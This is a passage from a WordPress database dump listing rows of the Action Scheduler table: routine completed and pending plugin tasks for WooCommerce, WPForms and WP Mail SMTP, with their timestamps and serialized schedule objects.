01:24:16','[1]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746906856;s:18:\"\0*\0first_timestamp\";i:1644827400;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746906856;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',6,1,'2025-05-10 19:55:31','2025-05-11 01:25:31',0,NULL,10),(153177,'wpforms_email_summaries_fetch_info_blocks','complete','2025-05-10 19:54:16','2025-05-11 01:24:16','{\"tasks_meta_id\":null}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746906856;s:18:\"\0*\0first_timestamp\";i:1664884584;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746906856;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2025-05-10 19:55:31','2025-05-11 01:25:31',0,NULL,10),(153178,'wpforms_builder_help_cache_update','complete','2025-05-10 19:54:16','2025-05-11 01:24:16','{\"tasks_meta_id\":11}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746906856;s:18:\"\0*\0first_timestamp\";i:1666764569;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746906856;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2025-05-10 19:55:31','2025-05-11 01:25:31',0,NULL,10),(153243,'wp_mail_smtp_admin_notifications_update','complete','2025-05-05 14:31:41','2025-05-05 20:01:41','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746455501;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746455501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-05 14:34:04','2025-05-05 20:04:04',0,NULL,10),(153244,'wcfmvm_membership_scheduler','complete','2025-05-05 14:31:41','2025-05-05 20:01:41','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746455501;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746455501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-05 14:34:05','2025-05-05 20:04:05',0,NULL,10),(153245,'woocommerce_cleanup_draft_orders','complete','2025-05-05 14:31:41','2025-05-05 20:01:41','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746455501;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746455501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-05 14:34:05','2025-05-05 20:04:05',0,NULL,10),(153246,'wpforms_process_forms_locator_scan','complete','2025-05-05 14:31:41','2025-05-05 20:01:41','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746455501;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746455501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-05 14:34:05','2025-05-05 20:04:05',0,NULL,10),(153248,'wpforms_process_purge_spam','complete','2025-05-05 14:31:41','2025-05-05 20:01:41','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746455501;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746455501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-05 14:34:05','2025-05-05 20:04:05',0,NULL,10),(153249,'wpforms_process_purge_spam','complete','2025-05-05 14:31:41','2025-05-05 20:01:41','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746455501;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746455501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-05 14:34:05','2025-05-05 20:04:05',0,NULL,10),(153324,'wp_mail_smtp_admin_notifications_update','complete','2025-05-06 14:34:04','2025-05-06 20:04:04','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746542044;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746542044;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-06 15:11:17','2025-05-06 20:41:17',0,NULL,10),(153325,'wcfmvm_membership_scheduler','complete','2025-05-06 14:34:05','2025-05-06 20:04:05','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746542045;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746542045;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-06 15:11:17','2025-05-06 20:41:17',0,NULL,10),(153326,'woocommerce_cleanup_draft_orders','complete','2025-05-06 14:34:05','2025-05-06 20:04:05','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746542045;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746542045;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-06 15:11:17','2025-05-06 20:41:17',0,NULL,10),(153327,'wpforms_process_forms_locator_scan','complete','2025-05-06 14:34:05','2025-05-06 20:04:05','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746542045;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746542045;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-06 15:11:17','2025-05-06 20:41:17',0,NULL,10),(153329,'wpforms_process_purge_spam','complete','2025-05-06 14:34:05','2025-05-06 20:04:05','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746542045;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746542045;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-06 15:11:17','2025-05-06 20:41:17',0,NULL,10),(153330,'wpforms_process_purge_spam','complete','2025-05-06 14:34:05','2025-05-06 20:04:05','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746542045;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746542045;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-06 15:11:17','2025-05-06 20:41:17',0,NULL,10),(153384,'wpo_ips_semaphore_lock_cleanup','pending','2025-06-04 21:47:20','2025-06-05 03:17:20','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1749073640;s:18:\"\0*\0first_timestamp\";i:1728333807;s:13:\"\0*\0recurrence\";i:2592000;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1749073640;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:2592000;}',10,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(153532,'wp_mail_smtp_admin_notifications_update','complete','2025-05-07 15:11:17','2025-05-07 20:41:17','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746630677;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746630677;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-07 15:25:30','2025-05-07 20:55:30',0,NULL,10),(153533,'wcfmvm_membership_scheduler','complete','2025-05-07 15:11:17','2025-05-07 20:41:17','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746630677;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746630677;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-07 15:25:30','2025-05-07 20:55:30',0,NULL,10),(153534,'woocommerce_cleanup_draft_orders','complete','2025-05-07 15:11:17','2025-05-07 20:41:17','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746630677;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746630677;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-07 15:25:30','2025-05-07 20:55:30',0,NULL,10),(153535,'wpforms_process_forms_locator_scan','complete','2025-05-07 15:11:17','2025-05-07 20:41:17','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746630677;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746630677;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-07 15:25:30','2025-05-07 20:55:30',0,NULL,10),(153537,'wpforms_process_purge_spam','complete','2025-05-07 15:11:17','2025-05-07 20:41:17','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746630677;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746630677;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-07 15:25:30','2025-05-07 20:55:30',0,NULL,10),(153538,'wpforms_process_purge_spam','complete','2025-05-07 15:11:17','2025-05-07 20:41:17','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746630677;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746630677;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-07 15:25:30','2025-05-07 20:55:30',0,NULL,10),(153569,'woocommerce_run_product_attribute_lookup_regeneration_callback','complete','2025-05-06 21:44:07','2025-05-07 03:14:07','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1746567847;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1746567847;}',7,1,'2025-05-06 21:44:09','2025-05-07 03:14:09',0,NULL,10),(153679,'wp_mail_smtp_admin_notifications_update','complete','2025-05-08 15:25:30','2025-05-08 20:55:30','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746717930;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746717930;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-08 18:59:08','2025-05-09 00:29:08',0,NULL,10),(153680,'wcfmvm_membership_scheduler','complete','2025-05-08 15:25:30','2025-05-08 20:55:30','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746717930;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746717930;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-08 18:59:08','2025-05-09 00:29:08',0,NULL,10),(153681,'woocommerce_cleanup_draft_orders','complete','2025-05-08 15:25:30','2025-05-08 20:55:30','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746717930;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746717930;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-08 18:59:08','2025-05-09 00:29:08',0,NULL,10),(153682,'wpforms_process_forms_locator_scan','complete','2025-05-08 15:25:30','2025-05-08 20:55:30','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746717930;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746717930;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-08 18:59:08','2025-05-09 00:29:08',0,NULL,10),(153684,'wpforms_process_purge_spam','complete','2025-05-08 15:25:30','2025-05-08 20:55:30','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746717930;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746717930;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-08 18:59:08','2025-05-09 00:29:08',0,NULL,10),(153685,'wpforms_process_purge_spam','complete','2025-05-08 15:25:30','2025-05-08 20:55:30','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746717930;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746717930;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-08 18:59:08','2025-05-09 00:29:08',0,NULL,10),(153775,'wp_mail_smtp_admin_notifications_update','complete','2025-05-09 18:59:08','2025-05-10 00:29:08','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746817148;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746817148;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-09 19:01:11','2025-05-10 00:31:11',0,NULL,10),(153776,'wcfmvm_membership_scheduler','complete','2025-05-09 18:59:08','2025-05-10 00:29:08','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746817148;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746817148;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-09 19:01:11','2025-05-10 00:31:11',0,NULL,10),(153777,'woocommerce_cleanup_draft_orders','complete','2025-05-09 18:59:08','2025-05-10 00:29:08','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746817148;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746817148;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-09 19:01:11','2025-05-10 00:31:11',0,NULL,10),(153778,'wpforms_process_forms_locator_scan','complete','2025-05-09 18:59:08','2025-05-10 00:29:08','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746817148;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746817148;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-09 19:01:11','2025-05-10 00:31:11',0,NULL,10),(153780,'wpforms_process_purge_spam','complete','2025-05-09 18:59:08','2025-05-10 00:29:08','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746817148;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746817148;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-09 19:01:11','2025-05-10 00:31:11',0,NULL,10),(153781,'wpforms_process_purge_spam','complete','2025-05-09 18:59:08','2025-05-10 00:29:08','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746817148;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746817148;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-09 19:01:11','2025-05-10 00:31:11',0,NULL,10),(154174,'wp_mail_smtp_admin_notifications_update','complete','2025-05-10 19:01:11','2025-05-11 00:31:11','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746903671;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746903671;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-10 19:02:06','2025-05-11 00:32:06',0,NULL,10),(154175,'wcfmvm_membership_scheduler','complete','2025-05-10 19:01:11','2025-05-11 00:31:11','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746903671;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746903671;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-10 19:02:06','2025-05-11 00:32:06',0,NULL,10),(154176,'woocommerce_cleanup_draft_orders','complete','2025-05-10 19:01:11','2025-05-11 00:31:11','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746903671;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746903671;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-10 19:02:06','2025-05-11 00:32:06',0,NULL,10),(154177,'wpforms_process_forms_locator_scan','complete','2025-05-10 19:01:11','2025-05-11 00:31:11','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746903671;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746903671;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-10 19:02:06','2025-05-11 00:32:06',0,NULL,10),(154179,'wpforms_process_purge_spam','complete','2025-05-10 19:01:11','2025-05-11 00:31:11','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746903671;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746903671;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-10 19:02:06','2025-05-11 00:32:06',0,NULL,10),(154180,'wpforms_process_purge_spam','complete','2025-05-10 19:01:11','2025-05-11 00:31:11','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746903671;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746903671;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-10 19:02:06','2025-05-11 00:32:06',0,NULL,10),(154740,'wp_mail_smtp_admin_notifications_update','complete','2025-05-11 19:02:06','2025-05-12 00:32:06','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746990126;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746990126;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-11 19:04:12','2025-05-12 00:34:12',0,NULL,10),(154741,'wcfmvm_membership_scheduler','complete','2025-05-11 19:02:06','2025-05-12 00:32:06','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746990126;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746990126;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-11 19:04:12','2025-05-12 00:34:12',0,NULL,10),(154742,'woocommerce_cleanup_draft_orders','complete','2025-05-11 19:02:06','2025-05-12 00:32:06','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746990126;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746990126;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-11 19:04:12','2025-05-12 00:34:12',0,NULL,10),(154743,'wpforms_process_forms_locator_scan','complete','2025-05-11 19:02:06','2025-05-12 00:32:06','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746990126;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746990126;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-11 19:04:12','2025-05-12 00:34:12',0,NULL,10),(154745,'wpforms_process_purge_spam','complete','2025-05-11 19:02:06','2025-05-12 00:32:06','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746990126;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746990126;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-11 19:04:12','2025-05-12 00:34:12',0,NULL,10),(154746,'wpforms_process_purge_spam','complete','2025-05-11 19:02:06','2025-05-12 00:32:06','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1746990126;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1746990126;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-11 19:04:12','2025-05-12 00:34:12',0,NULL,10),(154763,'wp_mail_smtp_summary_report_email','pending','2025-05-17 19:55:31','2025-05-18 01:25:31','[1]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747511731;s:18:\"\0*\0first_timestamp\";i:1644827400;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747511731;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',6,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(154764,'wpforms_email_summaries_fetch_info_blocks','pending','2025-05-17 19:55:31','2025-05-18 01:25:31','{\"tasks_meta_id\":null}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747511731;s:18:\"\0*\0first_timestamp\";i:1664884584;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747511731;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(154765,'wpforms_builder_help_cache_update','pending','2025-05-17 19:55:31','2025-05-18 01:25:31','{\"tasks_meta_id\":11}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747511731;s:18:\"\0*\0first_timestamp\";i:1666764569;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747511731;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(155235,'wp_mail_smtp_admin_notifications_update','complete','2025-05-12 19:04:12','2025-05-13 00:34:12','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747076652;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747076652;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-12 19:26:35','2025-05-13 00:56:35',0,NULL,10),(155236,'wcfmvm_membership_scheduler','complete','2025-05-12 19:04:12','2025-05-13 00:34:12','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747076652;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747076652;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-12 19:26:35','2025-05-13 00:56:35',0,NULL,10),(155237,'woocommerce_cleanup_draft_orders','complete','2025-05-12 19:04:12','2025-05-13 